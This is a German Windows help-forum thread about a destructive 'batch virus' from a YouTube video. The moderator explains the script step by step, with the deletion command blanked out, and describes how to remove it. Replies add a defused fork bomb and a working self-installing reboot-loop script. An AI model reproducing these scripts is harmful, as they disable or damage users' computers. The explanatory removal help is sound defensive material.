Zurück   Trojaner-Board > Web/PC > Alles rund um Windows

Alles rund um Windows: kann man einen batch befhel virus unter windows abstellen?

Windows 7 Hilfe zu allen Windows-Betriebssystemen: Windows XP, Windows Vista, Windows 7, Windows 8(.1) und Windows 10 - als auch zu sämtlicher Windows-Software. Alles zu Windows 10 ist auch gerne willkommen. Bitte benenne etwaige Fehler oder Bluescreens unter Windows mit dem Wortlaut der Fehlermeldung und Fehlercode. Erste Schritte für Hilfe unter Windows.

Antwort
Alt 15.05.2014, 11:30   #1
saufbiene
 
kann man einen batch befhel virus unter windows abstellen? - Standard

Problem: kann man einen batch befhel virus unter windows abstellen?



hi ich hab mal beim googlen nach einen toturial für ein spiel was im editor programiert wird bzw wie man es dort programmieren kann über ein toturial gestolpert was einen batch befehl virus zeigt.

Code:
ATTFilter
gelöscht
         
dieses video zeigt so einen ich habe nur mal so aus neugierde mir es angeschaut und wollte wissen ob der virus schädlich ist und wie man ihn wieder entfernt sollte er auf den pc gelangen.

grüße
saufbiene

PS:
sollte ich hier falsch sein in der rubrik bitte verschieben.
wusste nicht wo es jetzt hingehört.

Geändert von saufbiene (15.05.2014 um 12:10 Uhr) Grund: video link gelöscht

Alt 15.05.2014, 11:33   #2
Warlord711
/// TB-Ausbilder
 
kann man einen batch befhel virus unter windows abstellen? - Standard

kann man einen batch befhel virus unter windows abstellen? Anleitung / Hilfe



Dein Youtube Link ist ungültig.
__________________


Alt 15.05.2014, 11:35   #3
saufbiene
 
kann man einen batch befhel virus unter windows abstellen? - Standard

kann man einen batch befhel virus unter windows abstellen? Details



habe es geändert und hoffe das es jetzt geht
__________________

Alt 15.05.2014, 11:57   #4
Warlord711
/// TB-Ausbilder
 
kann man einen batch befhel virus unter windows abstellen? - Standard

Lösung: kann man einen batch befhel virus unter windows abstellen?





"Losbekommen" tut man ihn leicht, das ist ein einfachstes Batch Script.
Ärgerlich wäre nur das, was er anrichtet.

Ein "Virus" ist das nicht, den ihm fehlen wichtige Eigenschaften wie Selbstverbreitung, Selbsterhaltung durch Schutzmassnahmen, Trojanisierung usw.

Kurz gesagt:

Ein Kiddie hat ein Billiges Batch-Script gesammengeschrieben.

Ich hab mal den Code hier:

Code:
ATTFilter
@echo off

Rundll32 user32, SwapMouseButton

copy virus.bat "%userprofile%\Startm~1\Programs\Startup"

set date=1
time 0:00

cd %userprofile%\desktop
FOR %%A in (*.*) DO DXX %%A

cd %userprofile%\documents
FOR %%A IN (*.*) DO DXX %%A

cd %userprofile%\desktop
md %random%
.
.
.
md %random%
shutdown -r -t 120 -c "pwnd kuh!"
         
Das Script hat aber leider mit

Code:
ATTFilter
cd %userprofile%\desktop
FOR %%A in (*.*) DO DXX %%A

cd %userprofile%\documents
FOR %%A IN (*.*) DO DXX %%A
         


zerstörerische Komponenten, da diese Befehle den Inhalt vom Desktop, sowie vom Benutzerordner "Dokumente" löscht.


Ich habe den richtigen Befehl ersetzt, damit hier niemand das Script abkopiert und ausführt.

Der Ablauf ist so:
  1. Das Script vertauscht Linke+Rechte Maustaste
  2. Kopiert sich dann in den Autostart-Ordner, um beim Computerstart aufgerufen zu werden
  3. Setzt dann das Datum und Uhrzeit anders
  4. Löscht den INhalt vom Desktop und Dokumente Ordner
  5. Erstellt Ordner mit zufälligen Namen auf dem Desktop
  6. Startet dann den Rechner nach 2 Minute neu

Falls du dir den Quatsch angetan hast, musst du nur die Batch Datei löschen.
Sie sollte unter %userprofile%\Startm~1\Programs\Startup\virus.bat zu finden sein.

Alt 15.05.2014, 12:10   #5
saufbiene
 
kann man einen batch befhel virus unter windows abstellen? - Standard

Wie kann man einen batch befhel virus unter windows abstellen?



ahhh danke
für die info
werde auch den link zum video entfernen damit keiner sich den noch zsm baut und selber sich damit infiziert sage ich jetzt mal ^^


Alt 15.05.2014, 12:28   #6
painfulsmile
 
kann man einen batch befhel virus unter windows abstellen? - Standard

Wo kann man einen batch befhel virus unter windows abstellen? Lösung!



Immerhin kein /R in der Schleife :-) :-) :-)

Das wäre noch lustiger. :-)
__________________
--> kann man einen batch befhel virus unter windows abstellen?

Alt 15.05.2014, 13:06   #7
saufbiene
 
kann man einen batch befhel virus unter windows abstellen? - Standard

kann man einen batch befhel virus unter windows abstellen?



hihi ich glaube da würden sich viele noch mehr ärgern lach

Alt 15.05.2014, 13:19   #8
Warlord711
/// TB-Ausbilder
 
kann man einen batch befhel virus unter windows abstellen? - Standard

kann man einen batch befhel virus unter windows abstellen?



Ich sag es mal ganz offen:

Wer sowas nachmacht ohne sich zu informieren, ist selbst Schuld.

Dann lieber was "harmloseres":

Code:
ATTFilter
@echo off
:START
start %0
PAUSE
GOTO START
         
Nennt sich "Fork Bomb", da sich das Programm nur eine Schleife ist, die das Programm immer wieder neu aufruft (und damit auch wieder neue Schleifen, die wieder neue Instanzen starten usw.).


Ich hab wegen Nachmachungstäter eine PAUSE eingebaut Nimmt man diese raus, geht nix mehr.

Alt 15.05.2014, 13:39   #9
saufbiene
 
kann man einen batch befhel virus unter windows abstellen? - Standard

kann man einen batch befhel virus unter windows abstellen?



hmmm mir würde da auch noch ein spaß einfallen
einfach den rechner gar nicht hochfahren lassen sondern direkt wieder runterfahren lassen

leider kann ich hier keinen wiederherstellungspunkt einfügen bevor er das mit dem runterfahren macht -.-*
zum entfernen dieses scriptest am besten abgesicherter modus benutzen ^^

Code:
ATTFilter
@echo off
copy devil.bat "%userprofile%\Startm~1\Programs\Startup"
shutdown -r -t 00 -c "bye"
         
achso der shutdown befehl ist gar nicht so verkehrt im falle eines notfalls ^^
oder um zu verhindern das der pc runtergefahren wird

Geändert von saufbiene (15.05.2014 um 13:48 Uhr)

Alt 15.05.2014, 14:43   #10
Warlord711
/// TB-Ausbilder
 
kann man einen batch befhel virus unter windows abstellen? - Standard

kann man einen batch befhel virus unter windows abstellen? [gelöst]



Richtig.

Shutdown ist halt schon sinnvoll, um z.b. nach Ablauf eines Scriptes den Rechner herunterzufahren oder neu zu starten.

Etwas umfangreicher ist PsShutdown

Antwort

Themen zu kann man einen batch befhel virus unter windows abstellen?
abstellen, batch, befehl, editor, entfern, entfernt, google, googlen, https, programmieren, schädlich, spiel, video, virus, windows, wissen, youtube



Ähnliche Themen: kann man einen batch befhel virus unter windows abstellen?


  1. Windows 7: C:\PROGRA~2\SEARCH~1\bin\VC32LO~.DLL ist entweder nicht für die Ausführung unter Windows vorgesehn oder enthält einen Fehler...
    Log-Analyse und Auswertung - 03.04.2015 (11)
  2. Kann ich durch eine unvollständig gedownloadete DLL Datei einen Virus haben?
    Plagegeister aller Art und deren Bekämpfung - 08.08.2014 (1)
  3. Welche Dienste kann ich unter Windows 8 abschalten?
    Alles rund um Windows - 11.10.2013 (3)
  4. Internet sehr langsam? Kann das durch einen Virus passieren?
    Netzwerk und Hardware - 04.07.2013 (32)
  5. C:\Windows\system32\d3dx9_37.dll ist entweder nicht für die Ausführung unter Windows vorgesehen oder enthält einen Fehler.
    Alles rund um Windows - 23.03.2013 (3)
  6. ich glaub ich habe einen virus(trojaner>JS/Exploit-Blacole.ht< unter anderen.)
    Plagegeister aller Art und deren Bekämpfung - 27.12.2012 (5)
  7. ich glaub ich habe einen virus(trojaner>JS/Exploit-Blacole.ht< unter anderen.) sorry habe im ersten thema so ziemlich alles falsch gemacht
    Mülltonne - 21.12.2012 (4)
  8. Kann ich einen Windows 7 Key mehrfach benutzen?
    Alles rund um Windows - 16.08.2012 (1)
  9. Wie kann ich einen Virus löschen wo Anti-Virenprogramme nicht funktionieren?
    Plagegeister aller Art und deren Bekämpfung - 27.02.2012 (5)
  10. Bekomme nurmehr einen Blouscreen und kann nichtmehr ins Windows
    Plagegeister aller Art und deren Bekämpfung - 16.12.2009 (1)
  11. - habe einen virus oder trojaner den ich nicht identifizieren kann -
    Mülltonne - 04.01.2009 (0)
  12. Ich hab einen Virus (Worm/IrcBot.acu.1), kann es nicht löschen !
    Mülltonne - 22.11.2008 (0)
  13. Habe mir einen Virus eingefangen-TR/Crypt.XPACK.Gen-WER KANN HELFEN
    Plagegeister aller Art und deren Bekämpfung - 12.09.2008 (2)
  14. Wer kann helfen, hab mir einen Virus eingefangen TR/Crypt.XPACKT.Gen
    Log-Analyse und Auswertung - 08.09.2008 (5)
  15. Batch-Virus Probleme: VIRUS ALERT! Benötige Hilfe zur vollständigen Reinigung
    Plagegeister aller Art und deren Bekämpfung - 25.08.2008 (15)
  16. Wie kann ich unter Windows 2000 nachschauen, was für ein Motherboard ich habe?
    Alles rund um Windows - 07.08.2005 (9)

Zum Thema kann man einen batch befhel virus unter windows abstellen? - hi ich hab mal beim googlen nach einen toturial für ein spiel was im editor programiert wird bzw wie man es dort programmieren kann über ein toturial gestolpert was einen - kann man einen batch befhel virus unter windows abstellen?...
Archiv
Du betrachtest: kann man einen batch befhel virus unter windows abstellen? auf Trojaner-Board

Search Engine Optimization by vBSEO ©2011, Crawlability, Inc.